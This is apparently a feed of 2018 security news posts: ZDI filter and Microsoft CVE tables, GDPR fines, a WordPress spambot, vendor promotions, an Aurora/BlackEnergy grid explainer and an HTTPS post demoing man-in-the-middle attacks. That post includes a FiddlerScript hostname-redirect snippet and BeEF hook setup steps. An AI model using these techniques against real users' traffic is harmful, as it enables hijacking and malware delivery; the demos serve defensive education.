Earlier this week, I wrote a blog covering a couple of the statistics from the Zero Day Initiative’s (ZDI) first half of 2018. One of the stats that I didn’t cover is the increasing focus on enterprise applications. The team is seeing consistent growth in submissions of Microsoft and Apple vulnerabilities, but now they’re also seeing an increase of submissions in virtualization software vulnerabilities from the likes of VMware and Oracle. With a 33% increase in published advisories compared to 2017, the ZDI has their hands full. With more than 500 new researchers registering to participate in the program this year, the internal ZDI team is growing as well to accommodate this growth. 2018 may just be the biggest year yet for ZDI!

In case you missed it, you can read Brian Gorenc’s blog covering the detailed stats from the ZDI’s first half of 2018.

Microsoft Security Updates

This week’s Digital Vaccine® (DV) package includes coverage for Microsoft updates released on or before July 10, 2018. It was another big month for Microsoft with 53 security patches covering both browsers (Internet Explorer, Edge), ChakraCore, Windows, .NET Framework, ASP.NET, PowerShell, Visual Studio, and Microsoft Office and Office Services. Of these 53 CVEs, 18 are listed as Critical, 33 are rated Important, one is rated as Moderate, and one is rated as Low in severity.

Five CVEs in this month’s Microsoft update came through the Zero Day Initiative:

The following table maps Digital Vaccine filters to Microsoft’s updates. You can get more detailed information on this month’s security updates from Dustin Childs’ July 2018 Security Update Review from the Zero Day Initiative:

CVE # Digital Vaccine Filter # Status
CVE-2018-0949 32494
CVE-2018-8125 32486
CVE-2018-8171 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8172 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8202 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8206 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8222 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8232 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8238 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8242 32487
CVE-2018-8260 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8262 32491
CVE-2018-8274 32492
CVE-2018-8275 32493
CVE-2018-8276 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8278 32358
CVE-2018-8279 32359
CVE-2018-8280 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8281 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8282 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8283 32361
CVE-2018-8284 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8286 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8287 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8288 32488
CVE-2018-8289 32490
CVE-2018-8290 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8291 32360
CVE-2018-8294 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8296 32478
CVE-2018-8297 32551
CVE-2018-8298 32479
CVE-2018-8299 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8300 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8301 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8304 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8305 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8306 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8307 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8308 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8309 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8310 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8311 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8312 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8313 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8314 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8319 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8323 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8324 32558
CVE-2018-8325 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8326 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8327 Vendor Deemed Reproducibility or Exploitation Unlikely
CVE-2018-8356 Vendor Deemed Reproducibility or Exploitation Unlikely

 

Zero-Day Filters

There is one new zero-day filter covering one vendor in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

Advantech (1)

  • 32341: RPC: Advantech Webaccess webvrpcs Directory Traversal Vulnerability (ZDI-18-024)

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.

The post Zero-Day Coverage Update – Week of July 9, 2018 appeared first on .

GDPR takes its first victims

In the weeks leading up to the deadline for GDPR’s obligatory implementation, complaints to the leading data protection agencies in Europe about breaches of the new regulation piled up;and  it hasn’t taken long for the reactions, and of course, the sanctions, to appear. Facebook, which has been under scrutiny for months now, has received the first large sanction for not following the data processing standards found in the legislation.

And the fact is that two months after the GDPR came into force, data protection is still causing real headaches in many companies, both in Europe and further afield. Not only have we seen cases of intentional theft of data, but we’ve also seen cases where data has been lost due to internal cybersecurity carelessness.

And now we know the consequences of one of the cases of personal data abuse that has generated most interest among the public in the last few months: Facebook and Cambridge Analytica. A controversy that affected over 87 million users whose personal information was collected by the consulting firm without their express consent, and then sold to third parties, who supposedly used it to benefit Donald Trump’s presidential campaign.

Now, the Information Commissioner’s Office (ICO) in the UK has given Facebook a fine, the first the social network has received in relation to this scandal.  The £500,000 (€564,951.15) fine is the maximum stipulated by the country’s data protection laws.  This amount is probably not enough to make a dent in Facebook’s finances: the company is able to earn the same amount every five and a half minutes.

The IOC ruled that Facebook failed to safeguard its users’ data, and that it failed to be transparent with how it used this data or the interests that lay behind this abuse. The IOC will also bring criminal action against SCL Elections, Cambridge Analytica’s parent company.

So what has been the outcome of all this? The social network must pay the fine, although it is undoubtedly a minimal fine in comparison with the magnitude of the scandal.  It’s worth remembering that the GDPR can impose fines of up to 4% of a company’s annual turnover. This means that, had this been a sentence within the framework of the European Union, Facebook could have faced a fine of €1,581,863,215, significantly higher than the one imposed by the UK.

This is not an isolated case

While the Facebook controversy is making headlines, there are many other cases of abuse of data that have come to light in the last few months.

In September 2017, Equifax was implicated in one of the largest data breaches in history, when personal data of over 142 million people was leaked.  If we suppose that the company would have received the highest sanction possible under GDPR, Equifax would have faced the astronomical fine of 124 million dollars.

An even bigger case in terms of the amount of data affected was Exactis, a US marketing company. At the end of June, a database with 340 million individual records containing personal data was left exposed on the Internet without authentication.  This means that anyone could have accessed the database and its content.

Timehop was involved in another significant breach that exposed the data of 21 million users on July 4. The hacker that stole the data was able to gain access thanks to a cloud storage account that didn’t use multi-factor authentication. The company has stated that it contacted data protection officials shortly after the discovery of the breach.

It is clear that the economic sanctions that the GDPR entails are no trifling matter, and that, despite the increased interest in the subject of data protection, the problems surrounding the handling of personal information (PII) aren’t going to go away overnight.  But…

How can you avoid getting on the wrong side of GDPR?

If you’re worried about your company’s IT security, you’ll  be interested to find out about Panda Adaptive Defense, the advanced cybersecurity suite that incorporates Endpoint Protection (EPP) and Endpoint Detection and Response (EDR) solutions with 100% Attestation and Threat Hunting & Investigation services. The combination of these solutions and services provides a detailed overview of all activities on every endpoint, total control of running processes, and reduction of the attack surface.

Panda Adaptive Defense has modules created specifically to stop access, modification and exfiltration of both internal and external information.  Because Panda Data Control is able to discover, audit and monitor unstructured personal data on endpoints: from data at rest, to data in use and data in motion.

It stops uncontrolled access to your company’s sensitive data and helps you to company with the new data protection rules found in the GDPR.

The post GDPR takes its first victims appeared first on Panda Security Mediacenter.

Microsoft is working on” next generation’ security OS, hints synaptics

Synaptics hints that Microsoft’s next-generation operating system will have enhanced biometric features

It’s been three years since Microsoft introduced its last desktop operating system, Windows 10 in July 2015. The tech giant has since been regularly upgrading, improving and developing the current operating system (OS) with a continuous stream of feature updates.

However, a recently released press note from Synaptics, the leading developer of human interface solutions, mentions “a next-generation operating system” from Microsoft with a focus on biometric security and Windows Hello”. In other words, it hints that Microsoft is likely working on a next-generation OS that is secured by biometrics.

The press release notes titled “Synaptics, AMD Collaborate on Enterprise-Grade Biometric PC Security for Next-Generation Microsoft Operating System” announced “a joint initiative centered on delivering a new industry benchmark in highly-secure biometric fingerprint authentication for enterprise/commercial and consumer notebook PCs based on next-generation AMD Ryzen™ Mobile platform and Microsoft’s next-generation operating system.”

It further states, “The collaboration brings a new level of security for AMD-based laptops by leveraging Synaptics’ unique FS7600 Match-in-Sensor™ fingerprint sensor technology with powerful AMD Ryzen Mobile processors, and Microsoft’s forthcoming biometric security OS including Windows Hello.”

One can conclude from the announcement that the technology will also be based on AMD’s Ryzen Mobile platforms and a new operating system from Microsoft. However, the press release leaves many questions unanswered, as Microsoft itself hasn’t announced any upcoming releases.

However, it could be a reference to Microsoft’s rumored project called Polaris – the portable, lighter, simpler operating system version of Windows 10 targeted at desktop PCs or it could also relate to Windows Core OS, another rumored modular version of Windows 10 for IoT (Internet of Things) smart devices and not a completely new operating system that Microsoft develops.

You can check out the full press release here.

Microsoft’s partner conference, Inspire, is expected to be held from July 15th to 19th in Las Vegas, Nevada at the Mandalay Bay Convention Center and T-Mobile Arena. We can expect to hear more from Microsoft at this event. So, keep watching this space for more updates!!!

The post Microsoft is working on” next generation’ security OS, hints synaptics appeared first on TechWorm.

Spambot aims at targets WordPress sites in World Cup-Themed spam scam

Imperva observed a spambot targeting WordPress sites aimed at tricking victims into clicking on links to sites offering betting services on FIFA World Cup

Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites, attackers aimed at tricking victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.

Imperva monitored the activity of a botnet used to spread meaningless text messages generated from a template to comments sections in blogs, news articles, and other web sites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately and without regard for whether the site is has a comments section or is affected by exploitable known issues.

The comments are generated starting from this template that is known since at least 2013. The template allows to automatically create slightly different versions of the same message to use in spam campaigns.

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.

World Cup betting sites

“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small, it is composed of just 1,200 unique IPs with up to 700 daily unique IPs. The experts discovered that botnet has also been using URL-shortening, URL redirection, and other techniques to masquerade the landing sites of advertised links in its spam messages.

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-SPAM attacks on WordPress sites

Spambot World Cup

Just after the beginning of the 2018 World Cup, the botnet activity was focused on comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape, the most common countermeasure it to blacklist IPs originating spams messages and also the URLs that they advertise.

WordPress also has several Plug-ins that cuold defeat this boring activity.

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.

Pierluigi Paganini

(Security Affairs – spambot, World Cup spam)

The post Spambot aims at targets WordPress sites in World Cup-Themed spam scam appeared first on Security Affairs.

Kapersky Report: $10 Million in Ether Stolen Through Phishing Last Year

A new report from Kapersky Labs claims that cybercriminals are turning to cryptocurrency as a domain for scams and frauds. The schemes target ICO investors, who are perhaps vulnerable as they are seeking to invest money to begin with. “Kaspersky Lab experts have exposed a relatively new fraudulent trend: the development of cryptocurrency is not only attracting investors, but also cyber-criminals seeking to boost their profits,” reads the report.

View Full Story

ORIGINAL SOURCE: Unhashed

The post Kapersky Report: $10 Million in Ether Stolen Through Phishing Last Year appeared first on IT SECURITY GURU.

WordPress Sites Targeted in World Cup-Themed Spam Scam

Spammers using a ‘spray & pray’ approach to post comments on WordPress powered blogs, forums, says Imperva. WordPress-powered websites are being targeted in a comment spam campaign designed to get users to click on links to sites offering betting services on the 2018 FIFA World Cup games.

View Full Story

ORIGINAL SOURCE: Dark Reading

The post WordPress Sites Targeted in World Cup-Themed Spam Scam appeared first on IT SECURITY GURU.

‘Data is a fingerprint’: why you aren’t as anonymous as you think online

In August 2016, the Australian government released an “anonymised” data set comprising the medical billing records, including every prescription and surgery, of 2.9 million people.

View Full Story

ORIGINAL SOURCE: The Guardian

The post ‘Data is a fingerprint’: why you aren’t as anonymous as you think online appeared first on IT SECURITY GURU.

Windows Malware Carries Valid Digital Signatures

Researchers from Masaryk University in the Czech Republic and Maryland Cybersecurity Center (MCC) monitored suspicious organizations and identified four that sold Microsoft Authenticode certificates to anonymous buyers. The same research team also collected a trove of Windows-targeted malware carrying valid digital signatures.

View Full Story

ORIGINAL SOURCE: Infosecurity Magazine

The post Windows Malware Carries Valid Digital Signatures appeared first on IT SECURITY GURU.

Ukraine Says It Stopped a VPNFilter Attack on a Chlorine Distillation Station

The Ukrainian Secret Service (SBU) said today it stopped a cyber-attack with the VPNFilter malware on a chlorine distillation plant in the village of Aulska, in the Dnipropetrovsk region.

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Ukraine Says It Stopped a VPNFilter Attack on a Chlorine Distillation Station appeared first on IT SECURITY GURU.

Cylance Unveils “Cylance Smart Antivirus;” AI-Powered Antivirus for Consumers

Cylance Inc., the leading provider of AI-driven, prevention-first security solutions, today launched Cylance Smart Antivirus, AI-powered antivirus software designed specifically for consumers. By extending the enterprise-grade AI of CylancePROTECT into the home, Cylance provides internet users with next-generation security software that proactively predicts and blocks never-before-seen threats.

More than 350,000 new pieces of malware are created every day, and traditional consumer antivirus software simply can’t keep pace with today’s security reality. Existing solutions rely on reactive, signature-based technologies that slow down systems, bombard users with pop-up notifications, and require some form of breach in order to begin detecting malware. The exponential growth of malicious code, especially zero-day threats and ransomware, requires more innovative and thoughtful solutions to adequately—and effectively—protect end-users.

To help consumers stay ahead of bad actors, Cylance Smart Antivirus provides predictive security to spot and block threats before they have a chance to run without affecting device performance or disrupting the user.

“Consumers deserve security software that is fast, easy to use, and effective,” said Christopher Bray, senior vice president, Cylance Consumer. “The consumer antivirus market is long overdue for a groundbreaking solution built on robust technology that allows them to control their security environment.”

With Cylance Smart Antivirus, everyday internet users now have the option to purchase next-generation software built on artificial intelligence. Many people have experience with legacy products that are only as good as their last update. Such tools require extensive manual interactions such as downloads, installations, reboots, and scans. Cylance Smart Antivirus is a game-changer by offering an easy set-it-and-forget-it security experience that gives consumers true peace of mind and ease of use. Key features include:

  • Predictive threat prevention: With its AI-driven approach, Cylance Smart Antivirus is designed to proactively stop malicious threats, including complex malware variants.
  • Minimal impact on performance: Cylance Smart Antivirus runs silently and constantly without noticeable degradation of device performance, diminishing the constant pop-ups, scan requests, and bloatware features that characterize existing AV solutions.
  • Effortless user experience: Easy to install and manage, Cylance Smart Antivirus automatically updates in the background for a set-it-and-forget-it security experience. Users can get up and running in minutes, without unnecessary updates or reboots.
  • Visibility: Cylance Smart Antivirus empowers the technical expert in any family with full awareness and control of the security status of all devices regardless of device location. An easy-to-use web dashboard lets users set alerts if an attack has been blocked, monitor the status of protected devices, and view lists of malicious files blocked on each device.
  • Simple pricing: Cylance Smart Antivirus offers fair and transparent pricing. Unlike many vendors that steeply discount the first year of usage only to surprise consumers with auto-renewals at much higher rates, Cylance discounts subsequent years of use to encourage and reward long-term security hygiene.

The post Cylance Unveils “Cylance Smart Antivirus;” AI-Powered Antivirus for Consumers appeared first on IT SECURITY GURU.

Cortana security flaw means your PC may be compromised

Voice activated personal assistants are supposed to make our lives easier, which is why tech companies are building them into everything. Amazon’s range of smart speakers come pre-installed with Alexa, while smartphones ship with Siri, Google Now or Cortana depending on the manufacturer.

You can even find digital assistants built into your home computer now too. Ever since Windows 10 was released, PC users have been able to issue voice commands via Cortana just like they do using their phones.

Researchers uncover a new bug

Cybersecurity experts and hackers are constantly trying to find gaps and flaws that allow them to break into computers. And because Cortana is relatively new, the virtual assistance has been under intense scrutiny.

Sure enough, a flaw has been discovered that allows hackers to break into a Windows 10 PC using Cortana voice commands – even when it is locked. The problem is that Cortana is always listening. Although this is meant to make your life easier, it means that anyone can issue voice commands to the computer.

Normally it would be impossible to install malware or hack the computer while it is locked. But Cortana circumvents the usual safeguards, allowing a hacker to execute the commands that will install malware.

Don’t panic just yet

Cortana cannot be forced into downloading malware from the Internet or other computers – but it can be used to run scripts and other executables from a USB drive. This is good and bad news. Bad because Cortana can be tricked into installing malware, good because it can only be done with physical access to your computer.

If you can keep hackers out of your house, they won’t be able to access your computer. There is also no proof that the Cortana bug has been exploited by hackers yet.

Protect yourself

Just because the chances of falling victim to this particular hacking technique are rare, doesn’t mean you shouldn’t take steps to protect yourself. First, you must disable Cortana on the lock screen – you can find a complete guide here. Note that Cortana will still function normally once your computer is unlocked.

Next, you must install a reliable antivirus suite like Panda Dome. Panda Dome will detect malware and viruses automatically and prevent them being installed – by Cortana or any other method.

Finally, you must update Windows 10 regularly to patch these vulnerabilities as quickly as possible. Microsoft has already released an update address the Cortana flaw. You can download the patch directly from Microsoft Security TechCenter, or use Windows Update to fix this and other issues automatically.

With the patch applied, you can decide whether to re-enable Cortana on the lock screen or not.

Don’t wait

Every security risk needs to be fixed as soon as possible. Use the instructions above to bring your PC security up-to-standard – and don’t forget to download your free trial of Panda Dome either. You can learn more here.

Download your Antivirus

The post Cortana security flaw means your PC may be compromised appeared first on Panda Security Mediacenter.

Communication: A Significant Cultural Change for Embracing DevOps

Organizations can reap huge rewards by switching to a DevOps software development model. Some enterprises don’t know how to make the change. Recognizing that fact, I’ve spent the past few weeks discussing the benefits of a DevOps model, outlining how organizations can plan their transition, identifying common problems that companies commonly encounter and enumerating steps […]… Read More

The post Communication: A Significant Cultural Change for Embracing DevOps appeared first on The State of Security.

Here’s Why Your Static Website Needs HTTPS

Presently sponsored by: Matchlight by Terbium Labs: Know when your exact data appears on the dark web. Contact us for a demo today.

Here's Why Your Static Website Needs HTTPS

It was Jan last year that I suggested HTTPS adoption had passed the "tipping point", that is, it had passed the moment of critical mass and as I said at the time, "will very shortly become the norm". Since that time, the percentage of web pages loaded over a secure connection has rocketed from 52% to 71% whilst the proportion of the world's top 1 million websites redirecting people to HTTPS has gone from 20% to about half (projected). The rapid adoption has been driven by a combination of ever more visible browser warnings (it was Chrome and Firefox's changes which prompted the aforementioned tipping point post), more easily accessible certificates via both Let's Encrypt and Cloudflare and a growing awareness of the risks that unencrypted traffic presents. Even the government has been pushing to drive adoption of HTTPS for all sites, for example in this post by the National Cyber Security Centre in the UK:

all websites should use HTTPS, even if they don't include private content, sign-in pages, or credit card details

However, there remains an undercurrent of dissent; Scott Helme recently wrote about this and dispelled many of the myths people have for not securing their traffic. I shared some thoughts on what I suspect the real objection is in the tweet thread beginning with this one just a few days ago:

In one of many robust internet debates (as is prone to happen on Twitter), the discussion turned to the value proposition of HTTPS on a static website. Is it needed? Does it do any good? What's it actually protecting? I'd been looking for an opportunity to put together some material on precisely this topic so when a discussion eventually led to just such an offer, it seemed like the perfect time to write this post:

And just to be extra, extra sure this was Jacob's intention, he did later extend the same offer to another party and also (quite rightly in my opinion) observed that permission really isn't necessary to man in the middle your own traffic! So that's precisely what I've done - intercepted my own traffic passed over an insecure connection and put together a string of demos in a 24-minute video explaining why HTTPS is necessary on a static website. Here's the video and there's references and code samples for all the demos used immediately after that:

HTTPS Is Easy

The HTTPS Is Easy video series is 4 short videos of about 5 minutes each that make it dead simple to serve almost any site over a secure connection. Not only is the video series awesome (IMHO), the awesome community of people who've watched this have translated closed captions into 16 different languages already making HTTPS more accessible to more people than ever!

WiFi Pineapple

The Wifi Pineapple is a super-easy little device made by Hak5 that's not only easy stand up as a wireless hotspot, but can trick devices into thinking it's a known network that they automatically connect to without any user interaction whatsoever. I've done a heap of writing on this little device and regularly use it at conferences and training events.

ClippyJS

Everybody loves a bit of Clippy, just so long as it's in jest! I did this demo with ClippyJS and if you really want to relive the memories of days gone by, you can also embed Merlin, Rover and Links then orchestrate their behaviour via a set of actions invoked in the JS.

Cornify

Who doesn't love unicorns, right?! Cornify will help you liven up those otherwise dull pages with magical beasts and rainbows. Comes complete with Cornify buttons to add to your website (or someone else's).

Harlem Shake

There's actually a bit more to this than just entertainment value, the Harlem Shake has regularly been used as a "proof" for running script on a vulnerable site. For example, check out how it's used when embedded in the TXT record of a DNS entry which is then loaded into a WHOIS service which doesn't properly output encode the results. There's also Brenno de Winter's excellent example of XSS flaws in Dutch banks, again, demonstrated via a lot of shaking. Grab the entire script and then inject as required.

Cryptominer

I used Coinhive which offers to "Monetise Your Business With Your Users' CPU Power". Frankly, it's a pretty shady service regularly abused for malicious purposes but that was precisely what was required in this situation.

Router CSRF Exploit

This is from CVE-2018-12529 and the sample exploit was taken from the SecurityResearch101 blog. We've often seen CSRF attacks against routers result in DNS hijacking which, of course, is yet another risk that HTTPS protects against. We've known about this for years, including how the proceeds of this crime have been used to pay for Brazilian prostitutes.

DNS Hijacking

This was done with just a few lines of FiddlerScript in the OnBeforeRequest event:

if (oSession.HostnameIs("btlr.com")){
  oSession.hostname = "scripting.com";  
}

Were you using a device such as the Wifi Pineapple you can could achieve the same result using DNSspoof. The outcome is identical - traffic going to one insecure address results in traffic from a totally different address being returned.

China's Great Cannon

This was the attack back in 2015 that sought to take down GitHub, or at least the repository greatfire.org maintains there. I showed the de-obfuscated version in the video which you can find on Pastebin. The original version and a more detailed technical writeup on the incident can be found in this piece from Netresec. Incidentally, Baidu still doesn't serve their homepage over HTTPS by default (although the can serve a valid cert if explicitly requested over HTTPS) which gives the service the unenviable title of being the world's largest website not to do so according to Alexa.

BeEF

This, to me, was the most impactful demo not just because it resulted in pushing malware and phishing attacks to the target website, but because it shows just how much control an attacker can take over the browsing experience of victims on that site. Check out the BeEF project website for more background on that and if you want to implement the demo I ran, go and grab Kali Linux from VMDepot (now rolled into the Azure Marketplace) and deploy it directly into an Azure VM (I used the smallest size and it worked fine). I allowed inbound requests on port 80 as well as port 22 so I could SSH in. I then changed the port from 3000 to 80 in the config.yaml file (refer to the BeEF config documentation), included a script file from [vm ip]/hook.js in the victim site an browsed over to [vm ip]/ui/panel and logged in with "beef" and "beef". That's it!

Rick Roll

This one needs no introduction, going on half a billion views on YouTube, it's the surprise gift that keeps on giving!

The Aurora Power Grid Vulnerability and the BlackEnergy Trojan

At recent Industrial IoT security briefings, the Aurora vulnerability has come up repeatedly. Attendees ask, “Is our country’s power grid safe? How can we protect the grid? What is Aurora?” This post provides a look at Aurora, and the BlackEnergy attack that can exploit Aurora.

In March 2007, the US Department of Energy demonstrated the Aurora vulnerability. (See this video from CNN of the actual test: https://www.youtube.com/watch?v=fJyWngDco3g). What is happening?

An electric generator spins an electromagnet (the rotor) inside a coil of wire (the stator) to create electric power. The energy spinning the rotor can come from falling water in a hydroelectric power dam, from burning oil in a diesel generator, from steam created by nuclear fission in a nuclear power plant, or from the wind in a windmill. That electric power feeds the power grid for distribution to homes and businesses.

Other generators are also feeding the same grid. In the US, the power on the grid is 60 cycle alternating current. That means the voltage changes from its positive to its negative voltage sixty times per second. As long as the generator is in phase with the rest of the grid, its power will smoothly contribute to the total power of the grid. If the generator gets out of phase, that is, if its output is not synchronized with the power of the grid, the generator is working against the entire power of the rest of the grid.

DoE’s experiment used a 2.25 MW diesel generator. The Aurora vulnerability allows an attacker to disconnect the generator from the grid just long enough to get slightly out of phase with the grid, and then reconnect it. This desynchronization puts a sudden, severe strain on the rotor, which causes a pulse of mechanical energy to shake the generator, damaging the bearings and causing sudden increases in temperature. By disconnecting and reconnecting the generator’s circuit to the grid, the Aurora vulnerability led to the generator’s destruction in about three minutes.

In this test, though, the separate attack cycles (opening the breaker then closing it again) were not continuous. The DoE wanted to get readings from the generator as the attack progressed. In the wild, an attack would take much less time.

Mitigating the Aurora attack

To keep generators from self-destructing, the manufacturers build in safety systems that do not allow a generator to reconnect to the grid if it has been disconnected for 15 cycles (¼ of a second). Some generators may use mechanical relays. More commonly, the safety systems are software-controlled. For monitoring and operations, these systems are network-connected.

The separate open/close cycles in the Aurora attack take less than ¼ second. The attack happens before the safety systems can react.

At present, the mitigations in place are inadequate to mitigate the Aurora attack.

Enter BlackEnergy

BlackEnergy is a Trojan that can launch DDoS attacks, download custom spam, and steal banking credentials. Trend Micro’s Security Intelligence Blog posted a detailed description of the malware in this article in February 2016: https://blog.trendmicro.com/trendlabs-security-intelligence/killdisk-and-blackenergy-are-not-just-energy-sector-threats/. This malware has evolved since it was first detected in 2007. An updated variant was observed in 2010. In Nov 2015 BlackEnergy was discovered in attacks against power, mining, and rail companies in Ukraine, including the Dec 23, 2015 attack that cut power to 225,000 people.

The attack used BlackEnergy, delivered through phishing emails directed at employees and others involved with the target companies. The payload included the KillDisk malware, which attackers used to disable boot capabilities on target systems. This prevented their restoration, blocked remote access to systems, and rendered Uninterruptable Power Supply (UPS) systems useless. It also disrupted Serial-to-Ethernet devices. This damage delayed recovery considerably. Most systems could not be used until their firmware had been restored.  See https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01 from the US Department of Homeland Security Industrial Control Systems Cyber Emergency Response Team (DHS ICS-CERT).

Attack, Response, and Mitigation

The attack against Ukraine succeeded because the attackers completed comprehensive reconnaissance over months. They knew the specific equipment in use at each facility, they established backdoors in Human-Machine Interface (HMI) devices at those facilities, and they understood the recovery protocols and procedures at those facilities. They knew that disabling the Serial-to-Ethernet devices would make remote management impossible, stretching personnel to maintain operations and slowing remediation and recovery. They knew which UPSs to disable and how. They were prepared to lock operators out of their consoles (personnel reported that the cursors on the screens moved and could not be interrupted by the keyboard or mouse at the console).

Most importantly, the attackers did not fully exploit the Aurora vulnerability. No generators were destroyed. Power was restored in hours. If generators had been destroyed, recovery could have taken months. Most large generators are custom-built, not sold from inventory. Rebuilding the power grid would have been months and cost millions of dollars. And further, destroying the generators would have been an act of war. The attack was a threat.

The US power grid is equally vulnerable. Power distribution and generation organizations must segment their networks. Scan for malware. Maintain and analyze logs. Prepare for contingencies. Lock down systems. Isolate insecure devices.

What do your think? Post a comment below, or tweet me @WilliamMalikTM.

The post The Aurora Power Grid Vulnerability and the BlackEnergy Trojan appeared first on .

Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More

Hackers have breached the website of VSDC, a popular company that provides free audio and video conversion and editing software. Three different incidents have been recorded during which hackers changed the download links on the VSDC website with links that initiated downloads from servers operated by the attackers.

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More appeared first on IT SECURITY GURU.

Is banning USB drives the key to better security behaviour?

Convenience often beats security where users are concerned. Take USB keys, for example. They’re a very handy way to transfer files between computers, but they’re also a huge security risk. IBM recently attempted taking the drastic step of banning all removable portable storage devices (eg: USB, SD card, flash drive) completely. Should others follow suit?

To explore this issue deeper, I spoke to Neha Thethi, senior cybersecurity analyst at BH Consulting. She said for an attacker who has physical access to the victim’s machine, USB sticks are an effective way to install malicious software on a device or a network. Human nature being what it is, unsuspecting users will often plug unknown drives into their computers. From there, attackers have multiple ways to compromise a victim’s machine.

In fact, a classic tactic for security experts to test an organisation’s security awareness levels is to drop infected USB drives in a public area as part of a ‘red team’ exercise. If a percentage of employees picks up a key and plugs it into their machine, it’s a useful indicator of gaps in that organisation’s security.

Alternatives for file sharing

In Neha’s experience, given the current file sharing technologies available, many employees don’t need to use USBs for general tasks anyway. “We have found that restricting USB keys can definitely work. Most users in an organisation don’t really need access to those ports,” she said. Even where colleagues might need to share documents, it’s easier and safer to use a cloud service approved by their organisation.

But before banning USBs (or other removable media) outright, Neha recommends taking these five steps:

  • Discover what data you have
  • Know where you are storing the data
  • Classify the data according to its importance
  • Carry out a risk assessment for the most important data
  • Protect the data based on the level of risk – including encryption if necessary.

A company can take some of the steps by itself, but it’s best to use the experience of a security specialist within the company or a third party to carry out the security risk assessment. “The assessment should be conducted with the help of an expert team based on the type of industry and service you provide. Otherwise, you end up with an inaccurate picture of the security risks the organisation faces,” she said.

Prepare for pushback

If a USB ban is identified as a risk treatment measure, be prepared for pushback from some employees. Some of that will stem from company culture. Is the organisation reliant on rules, or do staff expect a degree of freedom? “Not everyone will give a round of applause for more security, because it is a hindrance and an extra step,” Neha warned. “Expect and anticipate pushback and therefore put in place incentives for blocking USBs. If people aren’t happy and are not on board with the change, it leads to them bending the rules.”

In some cases, there may be genuine exceptions to a no-USB rule. IBM itself faced pushbacks and is reportedly considering making a few exemptions. Neha also gave the example of a media company that uses high-quality digital photographs for its work. While it restricted USB ports for all employees, it made an exception for its media person. This person needed to transfer these high-quality images from the camera to a company device. Their specific role meant they got formal approval to have their USB port enabled.

Banning USB sticks should be workable in many cases, because better, more convenient and secure alternatives exist in the form of cloud sharing platforms. But like with the implementation of most security measures, it always helps to be prepared and plan for multiple scenarios.

The post Is banning USB drives the key to better security behaviour? appeared first on BH Consulting.

Finding Connections in the Global Village

To commemorate F-Secure’s 30th year of innovation, we’re profiling 30 of our fellows from our more than 25 offices around the globe.

